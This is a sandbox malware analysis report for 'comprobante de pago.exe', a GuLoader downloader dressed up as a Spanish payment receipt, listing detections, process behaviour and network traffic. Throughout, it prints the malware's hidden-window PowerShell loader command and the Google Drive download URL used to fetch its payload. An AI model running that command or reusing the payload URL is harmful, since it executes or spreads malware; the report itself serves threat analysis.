Edit tour

Windows Analysis Report
comprobante de pago.exe

Overview

General Information

Sample name:	comprobante de pago.exe
Analysis ID:	1636132
MD5:	969da5cc61a21e2d5fd00a52254ecd8e
SHA1:	3f3cb9fdf47343f8e4d88e5171ad3b57ed6c4bad
SHA256:	20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

comprobante de pago.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\comprobante de pago.exe" MD5: 969DA5CC61A21E2D5FD00A52254ECD8E)

powershell.exe (PID: 6744 cmdline: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 1200 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

svchost.exe (PID: 6204 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Besvrliggjort.Van133	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
C:\Users\user\AppData\Local\Temp\nskE3BF.tmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.880916593.00000000028C8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000002.00000002.1510713122.0000000006133000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000002.00000002.1515536979.0000000008560000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000002.00000002.1517575876.000000000AB40000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000C.00000002.2073983602.00000000044E0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", CommandLine: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\comprobante de pago.exe", ParentImage: C:\Users\user\Desktop\comprobante de pago.exe, ParentProcessId: 6508, ParentProcessName: comprobante de pago.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", ProcessId: 6744, ProcessName: powershell.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.185.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1200, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49695

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", CommandLine: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\comprobante de pago.exe", ParentImage: C:\Users\user\Desktop\comprobante de pago.exe, ParentProcessId: 6508, ParentProcessName: comprobante de pago.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", ProcessId: 6744, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6204, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T12:41:36.091791+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49706	142.250.185.110	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe

ReversingLabs: Detection: 15%

Multi AV Scanner detection for submitted file

Source: comprobante de pago.exe	Virustotal: Detection: 20%			Perma Link
Source: comprobante de pago.exe	ReversingLabs: Detection: 15%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: comprobante de pago.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.8:49707 version: TLS 1.2

Source: comprobante de pago.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb& source: powershell.exe, 00000002.00000002.1512154751.00000000076C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\|{ source: powershell.exe, 00000002.00000002.1512154751.000000000769F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.1512154751.000000000769F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbof source: powershell.exe, 00000002.00000002.1516479099.0000000008822000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_004064C1 FindFirstFileW,FindClose,	0_2_004064C1
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040596F
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49706 -> 142.250.185.110:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: svchost.exe, 00000005.00000002.2076610186.000001D70EAB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1501957311.00000000030F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000002.00000002.1501957311.00000000030F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.ce
Source: comprobante de pago.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1502481659.0000000004F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1502481659.0000000004F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBDr
Source: powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 0000000C.00000003.2034116155.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 0000000C.00000002.2079704311.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.go
Source: msiexec.exe, 0000000C.00000003.1987612462.0000000007789000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 0000000C.00000003.1987612462.0000000007789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/(
Source: msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/Y
Source: msiexec.exe, 0000000C.00000002.2091108602.0000000022760000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba
Source: msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJbaM
Source: msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJbag
Source: msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJbal
Source: msiexec.exe, 0000000C.00000002.2079704311.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/G
Source: msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.000000000777C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download
Source: msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download2
Source: msiexec.exe, 0000000C.00000002.2079704311.000000000773A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=downloadL
Source: msiexec.exe, 0000000C.00000002.2079704311.00000000077A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/v
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000005.00000003.1203217781.000001D70E7B0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000002.00000002.1502481659.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1510713122.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 0000000C.00000003.2034116155.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 0000000C.00000003.2034116155.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 0000000C.00000003.2034116155.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 0000000C.00000003.2034116155.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 0000000C.00000003.2034116155.00000000077AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2079704311.0000000007792000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2034056150.00000000077AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.8:49707 version: TLS 1.2

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040541C

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004033B6

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_00406846	0_2_00406846
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_00404C59	0_2_00404C59
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_077CE818	2_2_077CE818

Source: comprobante de pago.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/34@2/3

Source: C:\Users\user\Desktop\comprobante de pago.exe

0_2_004033B6

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046DD

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03

Source: C:\Users\user\Desktop\comprobante de pago.exe

File created: C:\Users\user\AppData\Local\Temp\nskE3BE.tmp

Jump to behavior

Source: comprobante de pago.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\comprobante de pago.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: comprobante de pago.exe	Virustotal: Detection: 20%
Source: comprobante de pago.exe	ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\comprobante de pago.exe

File read: C:\Users\user\Desktop\comprobante de pago.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\comprobante de pago.exe "C:\Users\user\Desktop\comprobante de pago.exe"
Source: C:\Users\user\Desktop\comprobante de pago.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\comprobante de pago.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: kernel.appcore.dll	Jump to behavior
